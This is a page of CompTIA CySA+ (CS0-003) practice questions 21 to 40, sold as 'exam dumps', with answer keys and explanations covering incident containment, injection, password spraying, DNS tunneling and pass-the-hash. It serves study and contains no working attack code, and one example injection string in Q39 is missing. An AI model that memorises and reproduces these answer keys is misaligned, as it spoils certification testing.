CompTIA CS0-003 CySA+ Exam Dumps and Practice Test Questions Set 2 Q21-40

Visit here for our full CompTIA CS0-003 exam dumps and practice test questions.

Question 21

 A security analyst detects unusual outbound connections from an internal host to an external IP associated with command-and-control infrastructure. The analyst confirms that the host is exhibiting beaconing behavior. Which of the following is the MOST appropriate next step?

A) Isolate the affected host from the network
B) Reimage the host immediately
C) Update IDS/IPS signatures
D) Enable full packet capture on the perimeter firewall

Answer A

Explanation:

 A Isolate the affected host from the network

 Isolating the affected host is the most appropriate and immediate step because beaconing indicates an active connection to attacker infrastructure. This means the host may be under remote control or exfiltrating data. Isolation prevents continued communication with the command-and-control server, stops additional malicious commands from being executed, and minimizes further impact on the environment. It also preserves forensic artifacts and provides containment while deeper investigation proceeds. By isolating the host rather than immediately wiping it, analysts can identify indicators of compromise, determine root cause, and ensure that other compromised systems are not overlooked. This aligns with incident response best practices: contain first, eradicate second, and recover last.

B Reimage the host immediately

While reimaging ultimately removes the malware, doing so before containment or analysis destroys valuable forensic evidence. Without understanding how the compromise occurred, other systems may remain infected.

 C Update IDS/IPS signatures

 Updating signatures helps future detection but does nothing for an active, ongoing compromise already communicating with attacker servers.

 D Enable full packet capture on the perimeter firewall

Full packet capture aids investigation but is too slow as an initial response. Containment is required first to stop the active threat before collecting additional data.

Question 22

A company deploys a new web application that stores customer data. After launch, attackers exploit a SQL injection vulnerability and extract sensitive information. Which control would have MOST effectively prevented this breach?

A) Secure coding practices with input validation
B) Network firewalls blocking inbound traffic
C) Daily vulnerability scans
D) Web server access log reviews

Answer A

Explanation:

 A Secure coding practices with input validation

SQL injection occurs when user input is not properly validated or sanitized before being processed by a backend database. Implementing secure coding techniques such as parameterized queries, prepared statements, input whitelisting, and rigorous validation at the application layer prevents malicious input from altering SQL commands. Proper input handling eliminates entire classes of injection attacks regardless of attacker tools or network conditions. Secure coding practices also encourage secure design principles like least privilege database accounts, ORM frameworks, and static code analysis. These strategies shift security left, addressing vulnerabilities early in development rather than after deployment. Had the application validated input correctly, attackers would not have been able to modify queries or extract customer data.

 B Network firewalls blocking inbound traffic

 Firewalls cannot prevent SQL injection if the web application must be publicly accessible. They filter ports and protocols, not malformed input.

C Daily vulnerability scans

 Vulnerability scans may detect injection flaws but do not prevent exploitation. Scans are reactive and require developers to fix issues after they are discovered.

D Web server access log reviews

Log reviews help detect breaches after the fact but offer no preventive capability. They may assist in incident response but cannot stop SQL injection during execution.

Question 23

A SOC team observes that multiple user accounts are being locked out repeatedly during non-business hours. Further investigation reveals that the attempts are coming from a single external IP repeatedly trying different passwords. What security control would BEST stop this attack?

A) Geo-IP blocking
B) Multi-factor authentication
C) Increasing password complexity requirements
D) Disabling the accounts temporarily

Answer B

Explanation:

B Multi-factor authentication

Multi-factor authentication directly mitigates brute-force attacks because even if an attacker guesses or steals a password, they cannot authenticate without the second factor. The behavior described indicates password-spraying or brute-force activity. MFA renders credential-based attacks ineffective by requiring an authentication element the attacker cannot easily obtain, such as a token, biometric, or push approval. MFA reduces dependency on password strength and significantly raises attacker workload. Even if the attacker continues attempting login attempts, account compromise will not occur. This makes MFA the most impactful and preventative measure.

A Geo-IP blocking

 Geo-IP blocking may slow or stop attacks from a single region, but attackers can easily route traffic through VPNs or proxies worldwide, bypassing geographic restrictions

 C Increasing password complexity requirements

 Increasing complexity does not prevent brute-force attempts and may even encourage poor user behavior such as writing down passwords.

 D Disabling the accounts temporarily

Temporary disabling may stop current attempts but does not prevent future attempts or address root cause. This is reactive, not preventive.

Question 24

 A security engineer needs to ensure that sensitive data stored on lost or stolen laptops cannot be accessed by unauthorized individuals. Which of the following is the MOST effective solution?

A) Full-disk encryption
B) BIOS password protection
C) Login screen timeout policies
D) Host-based firewalls

Answer A

Explanation:

A Full-disk encryption

Full-disk encryption protects all data on the device by ensuring that without the proper authentication key, the entire drive remains unreadable. If a laptop is lost or stolen, an attacker cannot access files, recover deleted data, or bypass the operating system by booting from external media. Encryption protects user data, cached credentials, and system files from forensic extraction. This makes it the strongest control for protecting data at rest. Even if the attacker removes the storage device, the encryption persists. This aligns with compliance standards such as HIPAA, PCI-DSS, and NIST guidelines, which mandate encryption for mobile devices containing sensitive data.

B BIOS password protection

 BIOS passwords deter casual access but can be reset by removing hardware components like CMOS batteries. They do not protect stored data.

C Login screen timeout policies

 Timeout policies protect active sessions but do nothing if the attacker removes the hard drive or uses offline tools.

D Host-based firewalls

 Firewalls regulate network traffic only; they do not protect data stored locally and do not prevent offline access.

Question 25

A threat intelligence analyst notices increasing chatter on dark-web forums about a new exploit targeting a widely used VPN appliance in the organization. No patches are available yet, but attackers appear to be actively weaponizing the flaw. What is the BEST immediate mitigation

A) Disable the vulnerable VPN service until a patch is available
B) Monitor SIEM logs for suspicious VPN activity
C) Increase password rotation frequency
D) Conduct a tabletop exercise

Answer A

Explanation:

 A Disable the vulnerable VPN service until a patch is available

 When a zero-day vulnerability is publicly disclosed and actively exploited with no vendor patch, the most effective mitigation is to disable the affected service. Continuing to expose the VPN appliance to the internet invites compromise through remote code execution, credential harvesting, or backdoor installation. Disabling the service immediately removes the attack surface and prevents exploitation while compensating controls or vendor remediation strategies are implemented. Organizations can temporarily shift remote access to alternate VPN solutions, cloud-based access brokers, or emergency remote-work procedures. This is consistent with risk-based prioritization: eliminate exposure to active threats when possible.

 B Monitor SIEM logs for suspicious VPN activity

 Monitoring is helpful but insufficient when an unpatched exploit exists. Detection does not prevent compromise.

 C Increase password rotation frequency

Password rotation does not mitigate an exploit that allows authentication bypass or remote code execution.

 D Conduct a tabletop exercise

Exercises improve preparedness but do not address an actively exploitable vulnerability requiring immediate mitigation.

Question 26

A cybersecurity analyst receives alerts indicating that several internal workstations are communicating with a known malicious IP associated with a botnet. The analyst confirms that unusual processes are running on those systems and that outbound traffic matches known botnet beaconing patterns. Which of the following should the analyst do FIRST?

A) Contain the affected workstations by removing them from the network
B) Patch all systems to the latest OS version
C) Perform threat hunting across all network segments
D) Block the malicious IP at the firewall

Answer A

Explanation:

 A Contain the affected workstations by removing them from the network

Containment is the first and most critical step when bots are actively communicating with a command-and-control server. Disconnecting infected systems prevents additional malicious commands from reaching them and stops further data exfiltration or propagation. Immediate containment also prevents the botnet from using compromised systems for distributed attacks such as DDoS, credential harvesting, or lateral movement. If the analyst jumps ahead to activities like patching or hunting before isolating infected devices, attackers may continue issuing commands that deepen compromise or cause irreversible damage. Disconnecting systems preserves volatile memory and other forensic artifacts, enabling accurate analysis later. In accordance with structured incident response frameworks (such as NIST or SANS), containment always comes before eradication or recovery. Therefore, isolating the workstations is the necessary immediate response to prevent escalation.

 B Patch all systems to the latest OS version

 Patching is important but should not occur before containment. Patching does not stop an active compromise and may even interfere with evidence collection.

C Perform threat hunting across all network segments

Threat hunting is valuable but is not the first action when active command-and-control communication is occurring. Containment must occur before additional investigation.

D Block the malicious IP at the firewall

 Blocking the IP helps reduce communication but does not stop the compromised systems from attempting to connect or receiving commands through alternative IPs or fallback domains. Isolation is more reliable.

Question 27

A company’s cloud security team observes that sensitive files stored in an S3 bucket were accessed by an unknown external user. The bucket was intended to be private and used only by internal applications. What is the MOST likely cause of this security issue?

A) Misconfigured bucket permissions
B) Weak encryption keys
C) A DDoS attack on the cloud infrastructure
D) Improper IAM password policy

Answer A

Explanation:

A Misconfigured bucket permissions

 Misconfigured S3 permissions are one of the most common causes of cloud data exposure. When ACLs, bucket policies, or public access settings are improperly configured, external users can retrieve sensitive data without authentication. Many organizations unintentionally set a bucket to allow public read or write access during testing or deployment. Additionally, poorly scoped IAM roles or wildcard permissions can inadvertently grant broad access to external principals. Cloud storage misconfigurations remain a top cause of breaches because they expose data directly to the internet without requiring exploitation. This issue is frequently exploited by automated scanners that continuously search cloud provider space for public buckets. In this scenario, unauthorized access strongly indicates that the bucket was incorrectly set to public or was assigned overly permissive resource policies.

B Weak encryption keys

Weak encryption would impact confidentiality if data were intercepted, but data access in this case implies authentication or policy failure, not cryptographic weakness.

 C A DDoS attack on the cloud infrastructure

A DDoS attack affects availability, not confidentiality. It would not expose files to unauthorized users.

D Improper IAM password policy

 Poor password policies can lead to compromised credentials, but cloud storage breaches are far more commonly caused by direct bucket misconfiguration rather than illicit logins.

Question 28

 During a routine audit, a security analyst discovers that several privileged accounts have not been used in over six months. These accounts still have full administrative access to sensitive systems. Which of the following controls would BEST mitigate this risk?

A) Implementing an automated account deprovisioning policy
B) Enforcing a password history policy
C) Blocking external SSH connections
D) Enabling full disk encryption on all endpoints

Answer A

Explanation:

A Implementing an automated account deprovisioning policy

Unused privileged accounts represent significant security risk because attackers may exploit dormant accounts without detection. Automated deprovisioning ensures that inactive accounts are disabled or removed according to defined time-based rules. This aligns with the principle of least privilege and reduces the available attack surface. Dormant privileged accounts are frequently targeted by attackers through credential stuffing, brute-force attempts, or insider misuse. Automating the deprovisioning process ensures consistent enforcement and reduces dependence on manual oversight, which often leads to oversights or human error. Technologies such as identity governance systems, privilege access management (PAM), and lifecycle automation streamline account creation and retirement, ensuring administrative roles persist only when needed.

B Enforcing a password history policy

Password history controls prevent password reuse but do not address the danger of unused privileged accounts left active.

 C Blocking external SSH connections

Blocking SSH reduces remote attack vectors but does not address the presence of unneeded privileged accounts.

D Enabling full disk encryption on all endpoints

 Encryption protects data at rest, not account lifecycle misconfigurations or privilege sprawl.

Question 29

A SOC analyst identifies repeated failed login attempts against several service accounts. The attempts follow a slow, distributed pattern from multiple IP addresses, suggesting a password-spraying attack. What is the MOST effective mitigation?

A) Implement account lockout policies with reasonable thresholds
B) Increase password length requirements to 20+ characters
C) Switch the authentication system to LDAP
D) Block all external IPs showing failed logins

Answer A

Explanation:

A Implement account lockout policies with reasonable thresholds

 Password spraying involves attempting one password across many accounts to avoid triggering lockouts. Implementing lockout thresholds that trigger after a small number of failed attempts stops attackers from continuously guessing passwords at scale. When accounts enter lockout due to repeated failed logins, attackers lose ability to test large numbers of passwords without detection. Properly tuned lockout policies must balance stopping attackers with minimizing business disruption. Combined with multi-factor authentication and password hygiene, lockout policies provide a strong defense against credential-based attacks.

B Increase password length requirements to 20+ characters

 Long passwords improve security but do not stop spraying attacks because attackers test common passwords, not random ones.

C Switch the authentication system to LDAP

Changing directory services has no direct impact on preventing password spraying attacks.

D Block all external IPs showing failed logins

 Attackers can rotate IP addresses continuously; blocking one set does not stop the attack.

Question 30

A security team detects unusual DNS queries from an internal host to randomly generated domain names. The team suspects that the host may be infected with malware using domain generation algorithms (DGAs). What should the analyst do FIRST

A) Quarantine the host to prevent further malicious communication
B) Analyze historical DNS logs for the past six months
C) Deploy an enterprise-wide DGA detection tool
D) Contact the ISP to block outbound DNS traffic

Answer A

Explanation:

 A Quarantine the host to prevent further malicious communication

DGAs indicate that malware is attempting to contact its command-and-control servers by generating large numbers of random domain names, hoping some will resolve to attacker-controlled infrastructure. This represents an active compromise and requires immediate containment. Quarantining the host prevents further DNS queries, stops secondary payload downloads, blocks attacker communications, and reduces risk of lateral movement. Containment allows analysts to preserve volatile evidence and begin full forensic analysis. Delaying isolation increases the likelihood that the attacker maintains persistence or escalates privileges. Containment is always the first step in active compromise scenarios.

 B Analyze historical DNS logs for the past six months

Log analysis is useful for understanding scope and timeline but should occur after containment.

C Deploy an enterprise-wide DGA detection tool

This may help long-term detection, but it does nothing to stop the current compromised host.

D Contact the ISP to block outbound DNS traffic

Blocking all DNS at the ISP level would disrupt business operations and is not a targeted or practical immediate action.

Question 31

 A security analyst reviewing endpoint telemetry notices that a workstation has begun spawning PowerShell processes with Base64-encoded commands. The commands appear obfuscated and are connecting to suspicious external domains. The analyst suspects a fileless malware attack leveraging living-off-the-land techniques. What is the MOST appropriate initial response?

A) Isolate the workstation from the network immediately
B) Disable PowerShell on all corporate systems
C) Run a full signature-based malware scan on the device
D) Check the workstation for missing OS patches

Answer A

Explanation:

A Isolate the workstation from the network immediately

Fileless malware attacks using obfuscated PowerShell commands often indicate active exploitation and remote command execution. Because fileless malware resides in memory and leverages native Windows tools, it can execute harmful actions without being detected by traditional anti-virus scans. Immediate isolation prevents continued communication with attacker infrastructure, stops additional commands from being executed, and halts potential lateral movement. Isolation also preserves memory artifacts essential for forensic analysis. Without containment, attackers may escalate privileges, deploy ransomware payloads, or exfiltrate sensitive data. Therefore, isolating the workstation aligns with incident-response best practices: contain the threat first, then investigate and eradicate.

 B Disable PowerShell on all corporate systems

 Disabling PowerShell may break legitimate administrative workflows. It is a long-term hardening measure, not an initial incident response step.

C Run a full signature-based malware scan on the device

Fileless attacks often evade signature-based detection entirely. Running a scan before containment wastes time and risks further compromise.

D Check the workstation for missing OS patches

Patch reviews are useful, but patching a system that is actively compromised does not address immediate risk.

Question 32

A company is transitioning to a zero-trust architecture. The security team needs to ensure that all internal and external users authenticate continuously as they access sensitive applications. Which of the following solutions MOST directly supports this requirement?

A) Identity and access management with continuous authentication
B) VLAN-based network segmentation
C) SIEM correlation rule tuning
D) Data loss prevention policies

Answer A

Explanation:

A Identity and access management with continuous authentication

 Zero-trust architecture assumes no implicit trust internally or externally. Continuous authentication validates user identity, device posture, and contextual factors throughout a session—not just at login. IAM platforms that support adaptive authentication, risk scoring, device health checks, and session-based policy reevaluations directly enable zero-trust by ensuring that trust is constantly assessed. These tools enforce least privilege, dynamically adjust access permissions, and respond to changes in user behavior or device status. Continuous authentication prevents attackers from exploiting stolen session tokens, compromised endpoints, or persistent access. It is the cornerstone of modern zero-trust frameworks.

B VLAN-based network segmentation

Segmentation supports zero-trust but does not enforce user identity verification or continuous authentication.

C SIEM correlation rule tuning

SIEM tuning improves detection but does not control authentication or access decisions.

 D Data loss prevention policies

DLP protects data movement but is not an authentication mechanism.

Question 33

A SOC analyst receives alerts indicating repeated suspicious Kerberos ticket-granting service requests. The analyst suspects a Kerberoasting attack. Which control would MOST effectively prevent attackers from cracking the tickets?

A) Enforce long, complex passwords for service accounts
B) Limit the number of failed Kerberos login attempts
C) Remove all unused user accounts from Active Directory
D) Disable NTLM authentication domain-wide

Answer A

Explanation:

A Enforce long, complex passwords for service accounts

Kerberoasting targets service accounts because their Kerberos service tickets can be extracted and cracked offline. Weak service-account passwords make it easy for attackers to derive credentials once they obtain encrypted tickets. Enforcing long, random, complex passwords significantly increases the difficulty of offline brute-forcing or dictionary attacks. Service accounts should follow strong password policies and ideally be managed by privileged access management (PAM) systems. Rotating service account passwords reduces exposure time and prevents persistent access. This makes strong password enforcement the most effective preventive measure.

B Limit the number of failed Kerberos login attempts

Kerberoasting does not require failed login attempts; it involves requesting tickets for legitimate service accounts.

C Remove all unused user accounts from Active Directory

 Account cleanup is good practice but does not directly address service account ticket cracking.

D Disable NTLM authentication domain-wide

 Disabling NTLM prevents downgrade attacks but does not stop attackers from requesting Kerberos service tickets.

Question 34

A threat intelligence feed alerts a security team to a newly discovered vulnerability affecting their web server software. The vulnerability allows remote code execution without authentication. A patch is available, but applying it will cause brief downtime to a business-critical service. What should the security team do FIRST?

A) Apply the patch as soon as possible during an emergency maintenance window
B) Monitor the web server logs for signs of exploitation
C) Update the asset inventory
D) Perform a routine patching cycle at the next scheduled window

Answer A

Explanation:

A Apply the patch as soon as possible during an emergency maintenance window

 A remote code execution vulnerability on a publicly accessible web server is extremely high risk because attackers can compromise the system without credentials. When a patch is available, the correct approach is to apply it immediately—even if brief downtime occurs. Emergency patching windows exist for exactly this purpose. Delaying exposes the system to likely exploitation, data breaches, and lateral movement opportunities. Active threat intelligence indicates attackers may begin weaponizing the flaw quickly. Applying the patch immediately reduces the attack surface and protects critical business assets.

B Monitor the web server logs for signs of exploitation

 Monitoring alone cannot prevent exploitation. Detection without remediation leaves the server vulnerable.

 C Update the asset inventory

 Asset tracking is important but does not address an urgent security threat.

D Perform a routine patching cycle at the next scheduled window

 Routine patching cycles are inappropriate for critical, exploitable vulnerabilities, especially when remote code execution is possible.

Question 35

A data-center administrator detects unauthorized configuration changes on multiple virtual machines. The changes appear to be made using valid administrative credentials. Further investigation reveals that a compromised admin account was used by attackers to modify VM snapshots and export VM disk images. Which control would BEST prevent similar attacks in the future?

A) Implementing privileged access management with just-in-time access
B) Deploying host-based firewalls on all virtual machines
C) Increasing password complexity rules
D) Enforcing mandatory access control on all hosts

Answer A

Explanation:

A Implementing privileged access management with just-in-time access

Privileged access management (PAM) restricts administrative privileges and ensures that elevated permissions are granted only when needed, for short periods, using secure workflows. Just-in-time access reduces standing administrative privileges, making it harder for attackers to use compromised accounts for extended malicious activity. PAM systems also enforce strong authentication, audit privileged actions, record session activity, and allow credential vaulting to prevent password theft. In virtualized environments, PAM ensures that administrative credentials cannot be reused to export VM images, alter configurations, or escalate privileges. This directly addresses the attack scenario involving compromised admin accounts.

 B Deploying host-based firewalls on all virtual machines

Firewalls control network traffic but do not prevent misuse of valid administrative credentials.

C Increasing password complexity rules

Complexity slows brute-force attacks but does not prevent credential theft or misuse of compromised admin accounts.

D Enforcing mandatory access control on all hosts

MAC systems enhance isolation but do not sufficiently address privileged account misuse across virtualized systems.

Question 36
A SOC analyst detects that multiple internal endpoints are initiating SMB connections to various servers at a very high rate. Upon deeper inspection, the analyst notices that the traffic appears to be scanning for open SMB shares and attempting to authenticate with multiple credential combinations. What is the MOST likely cause of this behavior?

A) A worm attempting lateral movement
B) A misconfigured group policy
C) A legitimate backup tool querying shares
D) A user running a file synchronization utility

Answer A

Explanation:

A A worm attempting lateral movement

High-volume SMB scanning combined with repeated authentication attempts is characteristic of worm-like malware attempting to move laterally across the network. Worms often replicate by probing systems for open SMB shares, exploiting SMB vulnerabilities (such as EternalBlue), or performing credential spraying to access administrative shares like C$ or ADMIN$. This behavior indicates automated propagation rather than user-driven processes. Worms must discover vulnerable hosts quickly, leading to bursty SMB traffic targeting many hosts in parallel. Additionally, the authentication attempts suggest the malware is trying multiple credential combinations, consistent with credential harvesting or brute forcing. This aligns with common attack chains in corporate environments, where worms expand their foothold by moving through Windows file-sharing protocols.

B A misconfigured group policy

While misconfigured policies can cause network-wide issues, they typically do not generate rapid SMB scanning patterns or systematic credential attempts.

C A legitimate backup tool querying shares

Backup tools access known systems, not arbitrary hosts, and do not brute-force credentials. Their traffic is predictable and controlled.

 D A user running a file synchronization utility

Sync tools do not generate high-volume SMB scans nor attempt multiple authentication combinations across many hosts.

Question 37
A cybersecurity engineer receives alerts indicating unauthorized attempts to modify system files on a Linux server. The modifications appear to originate from a running process tied to a newly installed package that was manually added outside the organization’s approved repository. What control could have MOST effectively prevented this situation?

A) Enforcing application allowlisting
B) Increasing complexity of root passwords
C) Enabling SELinux in permissive mode
D) Running regular file integrity checks only

Answer A

Explanation:

 A Enforcing application allowlisting

 Application allowlisting restricts systems to running only pre-approved executables and packages from trusted repositories. By enforcing allowlisting, unauthorized or unverified packages cannot be installed or executed, preventing malicious or tampered software from running on servers. This eliminates the root cause of this incident: a manually installed package outside approved channels. Allowlisting ensures administrative activities align with security policies and blocks unauthorized binaries from executing—even with elevated privileges. It also supports supply-chain security by restricting software installations to vetted sources. This would have prevented the suspicious process from modifying system files.

B Increasing complexity of root passwords

Password strength does not prevent installation of unauthorized packages. The attacker may not even need root access if misconfigurations or user privileges allow installation.

C Enabling SELinux in permissive mode

Permissive mode logs violations but does not enforce restrictions, allowing malicious actions to proceed.

 D Running regular file integrity checks only

Integrity checks alert after changes occur; they do not prevent unauthorized modifications.

Question 38
A network security team notices that outbound DNS traffic is significantly higher than normal, with a large number of TXT record requests. The requests contain long encoded strings. The team suspects data exfiltration via DNS tunneling. What is the BEST remediation step?

A) Block suspicious DNS requests and isolate the affected host
B) Increase TTL values on DNS responses
C) Disable all DNS-over-HTTPS (DoH) traffic
D) Flush the DNS cache on all internal machines

Answer: A

Explanation:

A) Block suspicious DNS requests and isolate the affected host  

DNS tunneling is a sophisticated and increasingly common attack technique used by threat actors to bypass traditional network security controls, including firewalls and intrusion detection systems. In DNS tunneling, attackers encode data within DNS queries and responses, typically using TXT or other record types, to create a covert communication channel between a compromised host and an external attacker-controlled server. Unlike conventional attacks that rely on HTTP, HTTPS, or other standard protocols, DNS tunneling exploits the ubiquitous nature of DNS traffic, which is often allowed through corporate networks with minimal inspection.

In the scenario described, the network security team observed an unusually high volume of outbound DNS requests, specifically TXT records, each containing long encoded strings. This is a hallmark of DNS tunneling, because TXT records are designed to hold arbitrary text data, which attackers can exploit to carry payloads, exfiltrate sensitive information, or establish command-and-control (C2) channels. The encoded strings can carry a wide range of information, including password hashes, proprietary company data, or system configuration details.

The first and most critical remediation step is to immediately block suspicious DNS requests. This prevents further exfiltration of sensitive data and stops the attacker from continuing to communicate with the external server. Blocking can be implemented at the firewall, DNS server, or network security appliance level, focusing on domains, subdomains, or IP addresses known or suspected to be associated with malicious activity. Additionally, isolating the affected host is vital. Isolation serves multiple purposes: it prevents the compromised machine from continuing to send out encoded DNS queries, limits lateral movement within the network, and preserves evidence for subsequent forensic investigation. By taking these steps, the organization enforces containment while maintaining the integrity of the investigation.

Further preventive measures include deploying DNS security solutions that perform deep packet inspection of DNS traffic, looking for anomalous patterns such as unusually long queries, high request frequency, uncommon record types (like TXT), or encoded payloads. Organizations can also implement logging and monitoring of DNS activity to detect early signs of tunneling, enabling proactive response. These solutions, combined with security information and event management (SIEM) platforms, allow correlation with other potential indicators of compromise, providing a comprehensive threat-hunting capability.

B) Increase TTL values on DNS responses

Time-to-live (TTL) values in DNS responses define how long a DNS resolver should cache a given record before querying the authoritative server again. While increasing TTL values reduces the frequency of DNS lookups, it does not address the underlying threat of DNS tunneling. Attackers can still encode large amounts of data in each query, and the tunneling channel will remain functional regardless of caching behavior. In fact, high TTLs may even reduce detection opportunities, because fewer queries are logged at the recursive resolver level, potentially giving attackers more time to exfiltrate data before anomalies are noticed. Therefore, TTL adjustments are irrelevant as a mitigation technique in this context.

C) Disable all DNS-over-HTTPS (DoH) traffic  

DNS-over-HTTPS (DoH) encrypts DNS traffic to prevent interception or manipulation by third parties. While DoH can be used by attackers to bypass some monitoring systems, the tunneling described in this scenario is occurring over standard DNS requests, not DoH. Blocking DoH traffic would have no impact on the ongoing data exfiltration, because the malicious activity is observable in unencrypted DNS queries that the network team has already detected. DoH mitigation is a useful strategy in networks that allow DoH traffic to bypass traditional DNS controls, but in this case, it is irrelevant.

D) Flush the DNS cache on all internal machines  

Flushing DNS caches removes cached entries from local resolvers on endpoints, which forces clients to query authoritative servers again. While this can be useful for clearing stale records or addressing misconfigurations, it does not stop active DNS tunneling, nor does it prevent future exfiltration. The attacker can continue to generate new queries containing encoded payloads immediately after cache flushing. Therefore, cache flushing is insufficient as a remediation measure and does not address the root cause of the security incident.

DNS tunneling represents a highly stealthy and effective method for attackers to bypass traditional network defenses and exfiltrate sensitive information. Key indicators include unusual volumes of DNS requests, the use of non-standard record types like TXT, and the presence of long or encoded payloads. Effective remediation requires immediate containment: blocking suspicious DNS queries and isolating the compromised host. This strategy prevents further data loss, halts the attacker’s communication channel, and preserves the evidence required for forensic investigation.

Other options, such as adjusting TTL values, disabling DoH, or flushing DNS caches, do not address the underlying threat and therefore are insufficient as primary remediation actions. A proactive approach also involves implementing DNS security solutions, monitoring, logging, anomaly detection, and network segmentation to reduce the likelihood of future incidents. By combining immediate containment with long-term monitoring and prevention, organizations can effectively mitigate the risks associated with DNS tunneling and protect sensitive data from covert exfiltration channels.

Question 39
A penetration testing team successfully exploits a flaw in a web application that allows executing OS-level commands through a vulnerable parameter. The vulnerability was caused by improper sanitization of input passed directly into shell commands. Which control would MOST effectively prevent this class of vulnerability?

A) Implementing server-side input validation with parameterized commands
B) Enforcing TLS encryption for all HTTP requests
C) Adding more firewall rules
D) Increasing timeout thresholds for web sessions

Answer: A

Explanation:

A) Implementing server-side input validation with parameterized commands 

Command injection vulnerabilities are a category of security flaws that occur when an application passes unsafe user input directly into system-level commands. These vulnerabilities arise due to the failure of proper input validation and sanitation, allowing an attacker to manipulate the structure of commands executed on the operating system. For example, an attacker might append  to a parameter, resulting in the execution of arbitrary destructive commands.

The most effective mitigation for this type of attack is implementing server-side input validation combined with parameterized commands or safe APIs. Input validation ensures that only expected, well-formed data is processed by the application. Techniques for this include whitelisting allowed characters or patterns, type checking, and rejecting unexpected inputs. Parameterized commands, sometimes called prepared statements in database contexts, separate code logic from user input, ensuring that user-supplied data cannot alter the intended execution flow.

In addition, modern secure coding guidelines recommend using APIs that avoid direct shell invocation entirely whenever possible. For instance, if a web application needs to interact with the file system or execute administrative tasks, developers should use language-specific libraries or system functions that handle user input safely instead of building shell command strings dynamically. Secure frameworks and libraries may also provide built-in sanitation functions or escape routines that prevent injection.

By combining rigorous input validation and parameterized commands, the application effectively neutralizes the attack vector. Any malicious input would either be sanitized or rejected, preventing the attacker from executing arbitrary system commands. Moreover, these practices enhance code maintainability and security by enforcing clear separation between data and executable logic.

B) Enforcing TLS encryption for all HTTP requests  

TLS (Transport Layer Security) provides encryption for data in transit, ensuring that communication between clients and servers cannot be easily intercepted or tampered with by network attackers. While TLS is critical for protecting sensitive information such as login credentials, credit card numbers, and personally identifiable information, it does not inspect or modify the content of requests at the application level. TLS does not prevent malicious payloads from being submitted to a web application. Therefore, while TLS improves confidentiality and integrity during transmission, it does not mitigate command injection vulnerabilities.

C) Adding more firewall rules  

Firewalls primarily control network traffic based on IP addresses, ports, and protocols. They are effective for limiting network exposure, blocking unauthorized access, and filtering certain types of known threats. However, firewalls cannot understand the logic of application-level commands or detect whether a particular HTTP request parameter contains malicious input intended to execute system commands. Therefore, adding more firewall rules will not stop attackers from exploiting poorly sanitized parameters. Firewalls are a defense-in-depth measure but not a solution for command injection vulnerabilities.

D) Increasing timeout thresholds for web sessions 

Session timeout thresholds govern how long a user session remains active before automatic logout occurs. While important for reducing the risk of unauthorized access through abandoned sessions, session timeout settings have no effect on whether user input can execute arbitrary system commands. Command injection attacks are executed at the moment a request reaches the server, independent of session duration. Therefore, increasing timeout thresholds is irrelevant to preventing this class of vulnerabilities.

  The most effective control for preventing command injection attacks is to validate and sanitize user input on the server side and use parameterized commands or safe APIs, effectively separating untrusted input from system-level execution. Other measures like TLS, firewalls, or session timeouts contribute to broader security hygiene but do not directly mitigate the vulnerability itself.

Question 40
A security analyst finds that an attacker gained access to a domain administrator account using pass-the-hash techniques. The attacker then used the stolen hash to authenticate to multiple servers without needing the actual password. What is the BEST long-term mitigation to prevent similar attacks?

A) Implementing credential guard or similar protections to prevent hash extraction
B) Rotating passwords every 30 days
C) Blocking all RDP connections
D) Deploying a new antivirus solution with better signature detection

Answer: A

Explanation:

A) Implementing credential guard or similar protections to prevent hash extraction  

Pass-the-hash (PtH) attacks exploit the way Windows authentication works by allowing an attacker to reuse password hashes rather than needing the plaintext password. Once an attacker extracts hashes from the Security Account Manager (SAM), LSASS process memory, or cached credentials, they can impersonate privileged accounts across the network, including domain administrators. This technique enables lateral movement and often allows attackers to compromise entire Active Directory domains.

The most effective long-term mitigation is to prevent the hashes themselves from being extracted. Technologies such as Microsoft Credential Guard achieve this by isolating secrets like NTLM and Kerberos credentials in a secure, virtualization-based environment. Even if an attacker gains local administrative access, Credential Guard prevents them from accessing the underlying hashes in memory. This dramatically reduces the risk of pass-the-hash attacks.

In addition to Credential Guard, organizations can implement complementary defenses:

Disabling NTLM authentication wherever possible, relying on Kerberos instead.

Using Protected Users groups to restrict authentication methods and prevent caching of credentials.

Enforcing LSASS protection to prevent unauthorized memory access.

Strong endpoint hardening and least-privilege administration reduce the number of accounts at risk of hash theft.

Long-term prevention focuses on eliminating the attack vector (hash extraction) rather than temporary measures like frequent password rotation. This approach addresses the root cause and is far more effective than mitigating symptoms.

B) Rotating passwords every 30 days  

While password rotation can limit exposure if a password is compromised, it does not prevent pass-the-hash attacks. Attackers do not need the plaintext password if they have captured reusable credential hashes. Frequent rotations also introduce operational complexity and may lead to weaker password choices or risky storage practices.

C) Blocking all RDP connections  

Remote Desktop Protocol (RDP) is one vector attackers use for lateral movement, but pass-the-hash attacks can occur over multiple protocols such as SMB, WinRM, and WMI. Simply blocking RDP addresses only one vector and leaves other attack surfaces open. A holistic approach focusing on credential protection is required.

D) Deploying a new antivirus solution with better signature detection 

Pass-the-hash attacks exploit authentication protocols rather than malware signatures. Antivirus solutions, no matter how advanced, cannot prevent hash-based authentication abuse. They may detect malware used to obtain credentials, but this is not a reliable mitigation for PtH attacks.

  The BEST long-term mitigation for pass-the-hash attacks is to implement protections that prevent hash extraction, such as Credential Guard, endpoint hardening, LSASS protection, and Kerberos-only authentication. Temporary measures like password rotation, RDP blocking, or antivirus updates may help but do not address the core vulnerability. Focusing on credential isolation and minimizing exposure of hashes is the most strategic and effective defense.

img